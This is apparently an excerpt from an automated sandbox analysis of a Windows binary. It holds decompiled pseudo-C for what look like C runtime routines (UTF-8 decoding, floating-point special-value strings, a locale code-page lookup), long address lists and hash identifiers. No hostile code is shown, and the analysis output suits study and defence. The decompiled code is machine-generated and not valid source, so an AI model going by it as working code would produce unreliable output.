									if(__eflags > 0) {
										goto L349;
									} else {
										__eflags = _t1203 - 1;
										if(__eflags < 0) {
											goto L349;
										} else {
											__eflags = _t1203 - _t1203;
											if(__eflags >= 0) {
												goto L349;
											} else {
												goto L334;
											}
										}
									}
								} else {
									_t1208 =  *_t1185;
									_t1185 = _t1185 + 1;
									_v26 = _t1208;
									__eflags = _t1208;
									if(_t1208 < 0) {
										__eflags = (_t1208 & 0x000000e0) - 0xc0;
										if((_t1208 & 0x000000e0) != 0xc0) {
											__eflags = (_t1208 & 0x000000f0) - 0xe0;
											if((_t1208 & 0x000000f0) != 0xe0) {
												__eflags = (_t1208 & 0x000000f8) - 0xf0;
												if(__eflags != 0) {
													goto L349;
												} else {
													_t885 = 4;
													goto L330;
												}
											} else {
												_t885 = 3;
												goto L330;
											}
										} else {
											_t885 = 2;
											L330:
											_v25 = _t885;
											_v27 = _t885;
											_push(7);
											_t1203 = _v25;
											_t1287 = (_t1287 << _v27) - 0x00000001 & _v26 & 0x000000ff;
											L334:
											_v40 = _t1203 & 0x000000ff;
											__eflags = _v40 - _v36;
											if(_v40 < _v36) {
												_v36 = _v40;
											}
											_v32 = _t1185;
											_v32 = _v32 - _v44;
											while(1) {
												_t869 = _v36;
												__eflags = _v32 - _t869;
												if(_v32 >= _t869) {
													break;
												}
												_t870 =  *_t1185;
												_t1185 = _t1185 + 1;
												_v32 = _v32 + 1;
												_t872 = _t870 & 0x000000c0;
												__eflags = _t872 - 0x80;
												if(__eflags != 0) {
													L349:
													_t864 = E00427389(__eflags, _t1382);
												} else {
													_t1287 = _t1287 << 0x00000006 | _t872 & 0x3f;
													__eflags = _t1287;
													continue;
												}
												goto L350;
											}
											_t1185 = _v40;
											__eflags = _t869 - _t1185;
											if(_t869 >= _t1185) {
												__eflags = _t1287 - 0xd800;
												if(_t1287 < 0xd800) {
													L344:
													__eflags = _t1287 - 0x10ffff;
													if(__eflags > 0) {
														goto L349;
													} else {
														_v24 = 0x80;
														_v20 = 0x800;
														_v16 = 0x10000;
														__eflags = _t1287 -  *((intOrPtr*)(_t1408 + (_t1203 & 0x000000ff) * 4 - 0x18));
														if(__eflags < 0) {
															goto L349;
														} else {
															__eflags = _t1338;
															if(_t1338 != 0) {
																 *_t1338 = _t1287;
															}
															 *_t1382 =  *_t1382 & 0x00000000;
															 *(_t1382 + 4) =  *(_t1382 + 4) & 0x00000000;
															asm("sbb edx, edx");
															_t864 = _t1287;
														}
													}
												} else {
													__eflags = _t1287 - 0xdfff;
													if(__eflags <= 0) {
														goto L349;
													} else {
														goto L344;
													}
												}
											} else {
												_t1207 = _t1203 - _v36;
												 *(_t1382 + 4) = _t1207 & 0x000000ff;
												 *_t1382 = _t1287;
												 *(_t1382 + 6) = _t1207 & 0x000000ff;
												goto L318;
											}
										}
									} else {
										__eflags = _t1338;
										if(_t1338 != 0) {
											 *_t1338 = _t1208 & 0x000000ff;
										}
										__eflags = _t1208;
										_t864 = 0 | _t1208 != 0x00000000;
									}
								}
							} else {
								L318:
								_t864 = 0xfffffffe;
							}
							L350:
							_pop(_t1339);
							_pop(_t1383);
							__eflags = _v12 ^ _t1408;
							return E0040D3AF(_t864, _t1185, _v12 ^ _t1408, _t1287, _t1339, _t1383);
						} else {
							L308:
							_t1423 = _v1932;
							_pop(_t1340);
							_pop(_t1384);
							if(_v1932 != 0) {
								E00429C9B(_t1200, _t1423,  &_v1940);
							}
							return E0040D3AF(_t1184, _t1184, _v8 ^ _t1407, _t1285, _t1340, _t1384);
						}
					} else {
						goto L14;
					}
				}
			}

0x00427509
0x00427514
0x0042751b
0x00427521
0x0042752a
0x00427538
0x00427548
0x0042754c
0x0042755e
0x00427564
0x0042754e
0x0042754e
0x0042754e
0x0042756b
0x00427571
0x00427572
0x00427574
0x00427583
0x0042757e
0x00427580
0x00427580
0x00427585
0x0042758f
0x00427597
0x004275a1
0x004275b0
0x004275b5
0x004275ff
0x00427603
0x00427608
0x00427609
0x0042760b
0x0042760d
0x00427613
0x00427613
0x00427616
0x00427616
0x00427619
0x004289ce
0x004289d3
0x004289d6
0x004289d8
0x00000000
0x004289da
0x004289da
0x004289da
0x00000000
0x004289da
0x0042761f
0x0042761f
0x0042761f
0x00427622
0x004289b6
0x00000000
0x00427628
0x00427628
0x00427628
0x0042762b
0x004289ac
0x00000000
0x00427631
0x00427631
0x00427634
0x004289a2
0x00000000
0x0042763a
0x00427643
0x00427650
0x00427654
0x00427657
0x0042765d
0x00427665
0x0042766b
0x00427675
0x00427675
0x00427678
0x00427684
0x00427686
0x0042768b
0x0042768b
0x0042768b
0x0042767a
0x0042767a
0x0042767c
0x0042767c
0x00427697
0x004276a5
0x004276ab
0x004276ad
0x004276b5
0x004276bb
0x004276c0
0x004276c2
0x004276c5
0x004276cb
0x004276cc
0x004276d1
0x004276d9
0x004276da
0x004276df
0x004276e8
0x004276e8
0x004276ea
0x004276e1
0x004276e1
0x004276e6
0x00000000
0x00000000
0x004276e6
0x004276f0
0x004276fe
0x00427700
0x00427709
0x0042770f
0x00427710
0x00427716
0x0042771c
0x00427722
0x00427ac1
0x00427ac4
0x00427bde
0x00427be0
0x00427be5
0x00427be5
0x00427be5
0x00427bf3
0x00427bfa
0x00427bfd
0x00427c02
0x00427c02
0x00427bff
0x00427bff
0x00427bff
0x00427c06
0x00427c08
0x00427c0c
0x00427c0e
0x00427c11
0x00427c40
0x00427c43
0x00427c46
0x00427c48
0x00427c4b
0x00427c4b
0x00427c4d
0x00427c58
0x00427c58
0x00427c4f
0x00427c4f
0x00427c4f
0x00427c5a
0x00427c5c
0x00427c67
0x00427c67
0x00427c5e
0x00427c5e
0x00427c5e
0x00427c70
0x00427c77
0x00427c78
0x00427c79
0x00427c7c
0x00000000
0x00000000
0x00427c7e
0x00427c7e
0x00427c4b
0x00427c86
0x00427c86
0x00427c13
0x00427c13
0x00427c20
0x00427c36
0x00427c3b
0x00427c3b
0x00427c9f
0x00427cab
0x00427cb8
0x00427cba
0x00427aca
0x00427aca
0x00427ad1
0x00427adb
0x00427ae5
0x00427ae7
0x00427aed
0x00427aed
0x00427aef
0x00427aef
0x00427af6
0x00427afd
0x00000000
0x00000000
0x00427b03
0x00427b06
0x00427b09
0x00000000
0x00427b0b
0x00427b0b
0x00427b0d
0x00427b10
0x00427b16
0x00427b1b
0x00427b18
0x00427b18
0x00427b18
0x00427b1f
0x00427b22
0x00427b26
0x00427b28
0x00427b2b
0x00427b57
0x00427b5a
0x00427b5d
0x00427b5f
0x00427b62
0x00427b62
0x00427b64
0x00427b6f
0x00427b66
0x00427b66
0x00427b66
0x00427b71
0x00427b73
0x00427b7e
0x00427b75
0x00427b75
0x00427b75
0x00427b88
0x00427b8f
0x00427b90
0x00427b91
0x00427b94
0x00000000
0x00000000
0x00427b96
0x00427b96
0x00427b62
0x00427b9e
0x00427b9e
0x00427b2d
0x00427b34
0x00427b41
0x00427b4d
0x00427b52
0x00427b52
0x00427bb7
0x00427bc3
0x00427bd2
0x00427bd2
0x00000000
0x00427b09
0x00427aef
0x00000000
0x00427ae7
0x00427cc1
0x00427cc1
0x00427cc4
0x00427cc9
0x00427ccf
0x00427ce8
0x00427cef
0x00427cf2
0x00427cf2
0x00427728
0x00427728
0x0042772f
0x00427739
0x00427743
0x00427745
0x00427929
0x00427929
0x00427935
0x0042793d
0x00427943
0x0042794d
0x00427953
0x00427958
0x0042795e
0x0042795f
0x0042795f
0x0042795f
0x00427966
0x0042796c
0x0042796e
0x0042797b
0x0042797e
0x00427989
0x00427989
0x00427989
0x00427980
0x00427981
0x00427981
0x00427990
0x00427996
0x0042799b
0x0042799e
0x004279a1
0x004279d4
0x004279da
0x004279e0
0x004279e2
0x004279e8
0x004279eb
0x00000000
0x004279ed
0x004279ed
0x004279f0
0x004279f1
0x004279f7
0x004279fd
0x004279ff
0x00427a07
0x00427a07
0x00427a0f
0x00427a12
0x00427a18
0x00427a18
0x00427a1a
0x00427a21
0x00427a21
0x00427a1c
0x00427a1c
0x00427a1c
0x00427a23
0x00427a29
0x00427a2c
0x00427a2e
0x00427a34
0x00427a34
0x00427a30
0x00427a30
0x00427a30
0x00427a58
0x00427a60
0x00427a6f
0x00427a70
0x00427a73
0x00427a79
0x00427a7a
0x00427a80
0x00427a86
0x00000000
0x00000000
0x00427a88
0x00427a88
0x00427a90
0x00427a90
0x00427a96
0x00427a98
0x00427a9a
0x00427aa2
0x00427aa2
0x00427aa2
0x00427aaa
0x00427aaa
0x004279a3
0x004279a3
0x004279a6
0x004279ac
0x004279c1
0x004279c6
0x004279c6
0x00427ab0
0x00427aba
0x0042774b
0x0042774b
0x0042774b
0x0042774d
0x00427754
0x0042775b
0x00000000
0x00000000
0x00427761
0x00427764
0x00427767
0x00000000
0x00427769
0x00427769
0x00427775
0x0042777d
0x00427783
0x0042778d
0x00427793
0x00427798
0x0042779e
0x0042779f
0x0042779f
0x0042779f
0x004277a6
0x004277ac
0x004277ae
0x004277bb
0x004277be
0x004277c9
0x004277c9
0x004277c9
0x004277c0
0x004277c1
0x004277c1
0x004277d0
0x004277d6
0x004277db
0x004277de
0x004277e1
0x00427814
0x0042781a
0x00427820
0x00427822
0x00427828
0x0042782b
0x00000000
0x0042782d
0x0042782d
0x00427830
0x00427831
0x00427837
0x0042783d
0x0042783f
0x00427847
0x00427847
0x0042784f
0x00427852
0x00427858
0x00427858
0x0042785a
0x00427861
0x00427861
0x0042785c
0x0042785c
0x0042785c
0x00427863
0x00427869
0x0042786c
0x0042786e
0x00427874
0x00427874
0x00427870
0x00427870
0x00427870
0x00427898
0x004278a0
0x004278af
0x004278b0
0x004278b3
0x004278b9
0x004278ba
0x004278c0
0x004278c6
0x00000000
0x00000000
0x004278c8
0x004278c8
0x004278d0
0x004278d0
0x004278d6
0x004278d8
0x004278da
0x004278e2
0x004278e2
0x004278e2
0x004278ea
0x004278ea
0x004277e3
0x004277e3
0x004277e6
0x004277ec
0x00427801
0x00427806
0x00427806
0x004278f2
0x004278f3
0x004278f9
0x004278f9
0x00000000
0x00427767
0x00000000
0x0042774d
0x004278fa
0x004278fa
0x00427907
0x0042790e
0x00427914
0x00427915
0x00427916
0x0042791c
0x00427921
0x00427921
0x00427cf3
0x00427cfd
0x00427cfe
0x00427d04
0x00427d06
0x004281e9
0x004281eb
0x004281ed
0x004281f3
0x004281f5
0x004281fb
0x004281fd
0x004285cb
0x004285cb
0x004285cd
0x004285d3
0x004285da
0x004285e0
0x004285e2
0x00428695
0x00428695
0x00428697
0x00428698
0x0042869e
0x00000000
0x004285e8
0x004285e8
0x004285ea
0x004285f0
0x004285f6
0x004285f8
0x004285fe
0x00428605
0x00428605
0x00428607
0x00428607
0x00428614
0x0042861b
0x00428621
0x00428624
0x00428625
0x0042862b
0x0042862b
0x0042862f
0x00428631
0x00428637
0x0042863d
0x00428640
0x00000000
0x00428642
0x00428642
0x00428649
0x00428649
0x00428640
0x00428631
0x004285f8
0x004285ea
0x004285e2
0x00428203
0x00428203
0x00428203
0x00428206
0x0042820a
0x0042820a
0x0042820b
0x0042821d
0x0042822a
0x00428239
0x00428263
0x00428268
0x0042826e
0x00428271
0x00428273
0x00428345
0x0042834b
0x00428419
0x0042841f
0x00428425
0x00428425
0x00428425
0x00428428
0x0042842a
0x0042842a
0x00428430
0x00428436
0x0042843c
0x0042843e
0x00428440
0x00428440
0x00428446
0x0042844c
0x0042844e
0x0042845a
0x00428460
0x00428450
0x00428450
0x00428452
0x00428452
0x00428466
0x00428468
0x0042846a
0x0042846a
0x00428470
0x00428472
0x00428474
0x0042847a
0x0042847c
0x0042857d
0x0042857d
0x00428583
0x00428588
0x00428588
0x0042858b
0x0042858c
0x00000000
0x00428482
0x00428482
0x00428482
0x00428486
0x004284a6
0x004284a8
0x004284aa
0x004284b0
0x004284b6
0x004284b8
0x0042855f
0x0042855f
0x00428562
0x00000000
0x00428568
0x00428568
0x0042856e
0x00000000
0x0042856e
0x004284be
0x004284be
0x004284be
0x004284c1
0x00000000
0x00000000
0x004284c3
0x004284c5
0x004284cd
0x004284d6
0x004284d6
0x004284d8
0x004284d8
0x004284ea
0x004284ed
0x004284f3
0x004284fc
0x004284ff
0x0042850c
0x0042850f
0x00428510
0x00428511
0x00428517
0x00428519
0x0042851f
0x00428525
0x00000000
0x00000000
0x00000000
0x00000000
0x00428527
0x00428527
0x00428527
0x00428529
0x00000000
0x00000000
0x0042852b
0x0042852e
0x00428651
0x00428651
0x00000000
0x00428534
0x00428534
0x00428536
0x00428538
0x00428538
0x00428538
0x00428540
0x00428543
0x00428543
0x00428549
0x0042854b
0x0042854d
0x00428554
0x0042855a
0x0042855c
0x00000000
0x0042855c
0x00000000
0x0042852e
0x00000000
0x00428527
0x00000000
0x004284be
0x00428488
0x00428488
0x0042848a
0x00428490
0x00428498
0x00428498
0x0042849b
0x0042849b
0x00000000
0x0042848a
0x00000000
0x00428574
0x00428574
0x00428575
0x00428575
0x00000000
0x00428482
0x00428351
0x00428357
0x0042835c
0x0042836e
0x0042837d
0x00428382
0x00428388
0x0042838b
0x0042838d
0x004283a7
0x004283a9
0x00000000
0x004283af
0x004283af
0x004283b6
0x00000000
0x004283bc
0x004283c2
0x004283c8
0x004283ca
0x004283ca
0x004283cc
0x004283cc
0x004283d5
0x004283dc
0x004283e2
0x004283e5
0x004283e6
0x004283e8
0x004283e8
0x004283f0
0x004283f2
0x00000000
0x004283f8
0x004283f8
0x004283fe
0x00428401
0x00428656
0x00428659
0x0042865f
0x00428674
0x00428679
0x0042867c
0x00428407
0x00428407
0x0042840e
0x00000000
0x0042840e
0x00428401
0x004283f2
0x004283b6
0x0042838f
0x0042838f
0x00428395
0x0042839b
0x0042839c
0x00428592
0x00428592
0x00428599
0x0042859a
0x0042859b
0x004285a0
0x004285a3
0x004285a3
0x004285a3
0x0042838d
0x00428279
0x00428279
0x0042827f
0x00428281
0x004282b9
0x004282bb
0x00000000
0x004282bd
0x004282bd
0x004282c4
0x00000000
0x004282c6
0x004282cc
0x004282ce
0x004282d4
0x004282d4
0x004282d6
0x004282d6
0x004282d8
0x004282e1
0x004282e8
0x004282eb
0x004282ec
0x004282ee
0x004282ee
0x004282f6
0x004282f8
0x00000000
0x004282fa
0x004282fa
0x00428300
0x00428303
0x00428317
0x0042831d
0x00428336
0x0042833b
0x0042833e
0x00000000
0x00428305
0x00428305
0x0042830c
0x00000000
0x0042830c
0x00428303
0x004282f8
0x004282c4
0x00000000
0x00428283
0x00428283
0x00428286
0x0042828c
0x004282a5
0x004282aa
0x004282ad
0x004282ad
0x004282ad
0x004282af
0x004282af
0x004282af
0x004285a5
0x004285a5
0x004285a7
0x00428683
0x0042868a
0x00428691
0x004286a4
0x004286aa
0x004286ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004285ad
0x004285b3
0x004285b3
0x004285b9
0x004285b9
0x004285c5
0x00000000
0x004285c5
0x00427d0c
0x00427d0c
0x00427d0e
0x00427d14
0x00427d16
0x00427d1c
0x00427d1e
0x004280fe
0x004280fe
0x00428100
0x00428106
0x0042810d
0x00428113
0x00428115
0x00428179
0x0042817b
0x00428181
0x00428187
0x00428189
0x0042818f
0x00428196
0x00428196
0x00428198
0x00428198
0x004281a5
0x004281ac
0x004281b2
0x004281b5
0x004281b6
0x004281bc
0x004281bc
0x004281c0
0x004281c2
0x004281c8
0x004281ce
0x004281d1
0x00000000
0x004281d7
0x004281d7
0x004281de
0x004281de
0x004281d1
0x004281c2
0x00428189
0x00428117
0x00428117
0x00428119
0x0042811f
0x00428125
0x00000000
0x00428125
0x00428115
0x00427d24
0x00427d24
0x00427d24
0x00427d27
0x00427d2b
0x00427d2b
0x00427d2c
0x00427d3e
0x00427d4b
0x00427d5a
0x00427d84
0x00427d89
0x00427d8f
0x00427d92
0x00427d94
0x00427e66
0x00427e6c
0x00427f50
0x00427f56
0x00427f5c
0x00427f5c
0x00427f5c
0x00427f5f
0x00427f61
0x00427f61
0x00427f67
0x00427f6d
0x00427f73
0x00427f75
0x00427f77
0x00427f77
0x00427f7d
0x00427f83
0x00427f85
0x00427f91
0x00427f97
0x00427f87
0x00427f87
0x00427f89
0x00427f89
0x00427f9d
0x00427f9f
0x00427fa1
0x00427fa1
0x00427fa7
0x00427fa9
0x00427fab
0x00427fb1
0x00427fb3
0x004280b4
0x004280b4
0x004280ba
0x004280bf
0x004280bf
0x004280c2
0x004280c3
0x00000000
0x00427fb9
0x00427fb9
0x00427fb9
0x00427fbd
0x00427fdd
0x00427fdf
0x00427fe1
0x00427fe7
0x00427fed
0x00427fef
0x00428096
0x00428096
0x00428099
0x00000000
0x0042809f
0x0042809f
0x004280a5
0x00000000
0x004280a5
0x00427ff5
0x00427ff5
0x00427ff5
0x00427ff8
0x00000000
0x00000000
0x00427ffa
0x00427ffc
0x00428004
0x0042800d
0x0042800d
0x0042800f
0x0042800f
0x00428021
0x00428024
0x0042802a
0x00428033
0x00428036
0x00428043
0x00428046
0x00428047
0x00428048
0x0042804e
0x00428050
0x00428056
0x0042805c
0x00000000
0x00000000
0x00000000
0x00000000
0x0042805e
0x0042805e
0x0042805e
0x00428060
0x00000000
0x00000000
0x00428062
0x00428065
0x00428128
0x00428128
0x0042812a
0x0042812f
0x00428135
0x0042813b
0x0042813c
0x00000000
0x0042806b
0x0042806b
0x0042806d
0x0042806f
0x0042806f
0x0042806f
0x00428077
0x0042807a
0x0042807a
0x00428080
0x00428082
0x00428084
0x0042808b
0x00428091
0x00428093
0x00000000
0x00428093
0x00000000
0x00428065
0x00000000
0x0042805e
0x00000000
0x00427ff5
0x00427fbf
0x00427fbf
0x00427fc1
0x00427fc7
0x00427fcf
0x00427fcf
0x00427fd2
0x00427fd2
0x00000000
0x00427fc1
0x00000000
0x004280ab
0x004280ab
0x004280ac
0x004280ac
0x00000000
0x00427fb9
0x00427e72
0x00427e78
0x00427e7d
0x00427e8f
0x00427e9e
0x00427ea3
0x00427ea9
0x00427eac
0x00427eae
0x00427ec8
0x00427eca
0x00000000
0x00427ed0
0x00427ed0
0x00427ed7
0x00000000
0x00427edd
0x00427ee3
0x00427ee9
0x00427eeb
0x00427eeb
0x00427eed
0x00427eed
0x00427ef6
0x00427efd
0x00427f03
0x00427f06
0x00427f07
0x00427f09
0x00427f09
0x00427f11
0x00427f13
0x00000000
0x00427f19
0x00427f19
0x00427f1f
0x00427f22
0x00427f38
0x00427f3e
0x00427f44
0x00427f45
0x00428142
0x00428142
0x00428149
0x0042814a
0x0042814b
0x00428150
0x00428153
0x00427f24
0x00427f24
0x00427f2b
0x00000000
0x00427f2b
0x00427f22
0x00427f13
0x00427ed7
0x00427eb0
0x00427eb0
0x00427eb6
0x00427ebc
0x00427ebd
0x004280c9
0x004280c9
0x004280d0
0x004280d1
0x004280d2
0x004280d7
0x004280da
0x004280da
0x004280da
0x00427eae
0x00427d9a
0x00427d9a
0x00427da0
0x00427da2
0x00427dda
0x00427ddc
0x00000000
0x00427dde
0x00427dde
0x00427de5
0x00000000
0x00427de7
0x00427ded
0x00427def
0x00427df5
0x00427df5
0x00427df7
0x00427df7
0x00427df9
0x00427e02
0x00427e09
0x00427e0c
0x00427e0d
0x00427e0f
0x00427e0f
0x00427e17
0x00427e19
0x00000000
0x00427e1b
0x00427e1b
0x00427e21
0x00427e24
0x00427e38
0x00427e3e
0x00427e57
0x00427e5c
0x00427e5f
0x00000000
0x00427e26
0x00427e26
0x00427e2d
0x00000000
0x00427e2d
0x00427e24
0x00427e19
0x00427de5
0x00000000
0x00427da4
0x00427da4
0x00427da7
0x00427dad
0x00427dc6
0x00427dcb
0x00427dce
0x00427dce
0x00427dce
0x00427dd0
0x00427dd0
0x00427dd0
0x004280dc
0x004280dc
0x004280de
0x00428157
0x0042815e
0x0042815e
0x0042815e
0x00428165
0x00428167
0x0042816d
0x0042816e
0x004286b1
0x004286b1
0x004286b2
0x004286b3
0x004286b8
0x00000000
0x00000000
0x00000000
0x00000000
0x004280e0
0x004280e6
0x004280e6
0x004280ec
0x004280ec
0x004280f8
0x00000000
0x004280f8
0x00427d1e
0x004286bb
0x004286bb
0x004286c1
0x004286c7
0x004286cd
0x004286cf
0x004286d1
0x004286d8
0x004286d8
0x004286da
0x004286da
0x004286e3
0x004286e4
0x004286ec
0x004286f3
0x004286f6
0x004286f7
0x004286fd
0x004286fd
0x00428701
0x00428707
0x00428709
0x0042870b
0x00428711
0x00428714
0x00428725
0x00428728
0x0042872e
0x00428743
0x00428748
0x00428716
0x00428716
0x0042871d
0x0042871d
0x00428714
0x00428709
0x00428759
0x00428760
0x00428768
0x00428769
0x0042876b
0x004288b7
0x004288b9
0x004288c9
0x004288cc
0x004288ce
0x00000000
0x004288bb
0x004288c1
0x00000000
0x004288c1
0x00000000
0x00428771
0x00428771
0x00428777
0x0042877a
0x00428780
0x00428783
0x00428789
0x0042878f
0x00428791
0x00428793
0x00428795
0x00428795
0x00428797
0x00428797
0x004287a4
0x004287ab
0x004287ae
0x004287af
0x004287b1
0x004287b2
0x004287b2
0x004287ba
0x004287c0
0x004287c2
0x004287c8
0x004287ca
0x004287d0
0x004287d3
0x0042888f
0x00428895
0x004288aa
0x004288af
0x004287d9
0x004287df
0x004287e6
0x004287e6
0x004287e6
0x004287e6
0x004287d3
0x004287ec
0x004287ec
0x004287f2
0x004287f2
0x004287f2
0x004287f8
0x004287fe
0x00428801
0x00428807
0x00428809
0x0042880b
0x00428811
0x00428813
0x00428813
0x00428813
0x00428811
0x00428818
0x00428819
0x0042881b
0x0042881d
0x0042881d
0x0042881f
0x00428821
0x00428827
0x00428829
0x0042882f
0x0042882f
0x00428835
0x00428837
0x00000000
0x00000000
0x0042883d
0x0042883f
0x00428841
0x00428841
0x00428843
0x00428843
0x00428853
0x0042885a
0x0042885d
0x0042885e
0x00428860
0x00428860
0x00428864
0x0042886a
0x0042886c
0x00428872
0x00428878
0x0042887b
0x004288d9
0x004288dc
0x004288e2
0x004288f7
0x004288fc
0x0042887d
0x0042887d
0x00428884
0x00428884
0x0042887b
0x0042890d
0x00428912
0x00428921
0x00428924
0x0042892e
0x0042892e
0x00428930
0x00428932
0x00428938
0x00428940
0x00428946
0x00428948
0x0042894e
0x00428950
0x0042895d
0x00428952
0x00428952
0x00428959
0x00428959
0x00428960
0x00428966
0x00428967
0x0042896d
0x0042896d
0x00428972
0x00428975
0x00428979
0x00428979
0x0042897a
0x0042897c
0x00428982
0x00428988
0x00000000
0x00000000
0x00000000
0x00428988
0x0042882f
0x0042898e
0x00428990
0x00428993
0x00428995
0x00428998
0x0042899e
0x00000000
0x0042899e
0x00427634
0x0042762b
0x00427622
0x004275b7
0x004275bc
0x004275c4
0x004275d8
0x004275dd
0x004275e1
0x004275e1
0x004275e4
0x004275ea
0x004275ef
0x004275f4
0x00428a03
0x00428a05
0x00428a06
0x00428a07
0x00428a08
0x00428a09
0x00428a0a
0x00428a0f
0x00428a12
0x00428a13
0x00428a18
0x00428a1f
0x00428a22
0x00428a25
0x00428a26
0x00428a29
0x00428a2a
0x00428a2d
0x00428a30
0x00428a31
0x00428a33
0x00428a35
0x00428a37
0x00428a37
0x00428a3e
0x00428a3f
0x00428a41
0x00428a4c
0x00428a43
0x00428a43
0x00428a48
0x00428a48
0x00428a51
0x00428a54
0x00428a56
0x00428a58
0x00428a5a
0x00428a66
0x00428a6a
0x00428ad3
0x00428ad7
0x00428adc
0x00428ade
0x00000000
0x00428ae4
0x00428ae4
0x00428ae7
0x00000000
0x00428aed
0x00428aed
0x00428aef
0x00000000
0x00000000
0x00000000
0x00000000
0x00428aef
0x00428ae7
0x00428a6c
0x00428a6c
0x00428a6e
0x00428a6f
0x00428a72
0x00428a74
0x00428a8f
0x00428a91
0x00428a9b
0x00428a9d
0x00428aa7
0x00428aa9
0x00000000
0x00428aaf
0x00428aaf
0x00000000
0x00428aaf
0x00428a9f
0x00428a9f
0x00000000
0x00428a9f
0x00428a93
0x00428a93
0x00428ab1
0x00428ab1
0x00428ab4
0x00428ab7
0x00428ac8
0x00428acc
0x00428af5
0x00428af8
0x00428afe
0x00428b01
0x00428b06
0x00428b06
0x00428b0c
0x00428b0f
0x00428b2d
0x00428b2d
0x00428b30
0x00428b33
0x00000000
0x00000000
0x00428b14
0x00428b16
0x00428b17
0x00428b1c
0x00428b1e
0x00428b20
0x00428ba1
0x00428ba2
0x00428b22
0x00428b2b
0x00428b2b
0x00000000
0x00428b2b
0x00000000
0x00428b20
0x00428b35
0x00428b38
0x00428b3a
0x00428b54
0x00428b5a
0x00428b64
0x00428b64
0x00428b6a
0x00000000
0x00428b6c
0x00428b6f
0x00428b76
0x00428b7d
0x00428b84
0x00428b88
0x00000000
0x00428b8a
0x00428b8a
0x00428b8c
0x00428b8e
0x00428b8e
0x00428b90
0x00428b93
0x00428b99
0x00428b9d
0x00428b9d
0x00428b88
0x00428b5c
0x00428b5c
0x00428b62
0x00000000
0x00000000
0x00000000
0x00000000
0x00428b62
0x00428b3c
0x00428b3c
0x00428b42
0x00428b49
0x00428b4b
0x00000000
0x00428b4b
0x00428b3a
0x00428a76
0x00428a76
0x00428a78
0x00428a7d
0x00428a7d
0x00428a81
0x00428a83
0x00428a83
0x00428a74
0x00428a5c
0x00428a5c
0x00428a5e
0x00428a5e
0x00428ba8
0x00428bab
0x00428bac
0x00428bad
0x00428bb6
0x004275fa
0x004289dc
0x004289dc
0x004289e3
0x004289e4
0x004289e5
0x004289ee
0x004289f3
0x00428a02
0x00428a02
0x00000000
0x00000000
0x00000000
0x004275c4

APIs

__floor_pentium4.LIBCMT ref: 004276C5

Strings

1#QNAN, xrefs: 004289B6
1#SNAN, xrefs: 004289AC
1#INF, xrefs: 004289C0
1#IND, xrefs: 004289A2

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0420666548a02e04042fa249aaf787cc7cc1949547ea15bbb56609d04af20b90
Instruction ID: f485c3b46074f3f2bc062db59b80210c77c65defcddb29109eb6a27f9f71957c
Opcode Fuzzy Hash: 0420666548a02e04042fa249aaf787cc7cc1949547ea15bbb56609d04af20b90
Instruction Fuzzy Hash: D9D22871E092298BDB64CE28ED407EEB7B5EB84305F5445EBD40DE7240EB78AE818F45

Uniqueness

Uniqueness Score: -1.00%

Function 00425CFB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00425CFB(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0041AFD2(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00425d00
0x00425d01
0x00425d08
0x00425dac
0x00425dc5
0x00425dcb
0x00425dd0
0x00425dd2
0x00425dd2
0x00425dd8
0x00425ddb
0x00425ddb
0x00425dc7
0x00425dc7
0x00000000
0x00425dc7
0x00425d0e
0x00425d13
0x00000000
0x00000000
0x00425d19
0x00425d1e
0x00425d20
0x00425d20
0x00425d26
0x00000000
0x00000000
0x00425d2b
0x00425d42
0x00425d42
0x00425d4b
0x00425d4d
0x00000000
0x00000000
0x00425d4f
0x00425d54
0x00425d56
0x00425d56
0x00425d5c
0x00000000
0x00000000
0x00425d61
0x00425d7f
0x00425d81
0x00425da4
0x00000000
0x00425da9
0x00425d9c
0x00000000
0x00000000
0x00425d9e
0x00000000
0x00425d9e
0x00425d63
0x00425d6b
0x00000000
0x00000000
0x00425d6d
0x00425d70
0x00425d76
0x00000000
0x00000000
0x00000000
0x00425d78
0x00425d7a
0x00425d7c
0x00000000
0x00425d7c
0x00425d2d
0x00425d35
0x00000000
